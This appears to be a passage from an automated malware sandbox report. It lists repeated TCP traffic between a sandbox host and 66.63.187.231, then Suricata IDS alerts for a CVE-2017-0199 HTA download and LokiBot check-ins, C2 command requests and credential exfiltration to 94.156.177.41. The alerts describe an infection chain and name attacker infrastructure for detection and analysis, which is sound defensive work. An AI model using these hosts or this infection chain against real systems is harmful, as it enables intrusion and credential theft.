                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 66.63.187.231:80 -> 192.168.2.22:49169
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49179
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.231:80 -> 192.168.2.22:49170
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
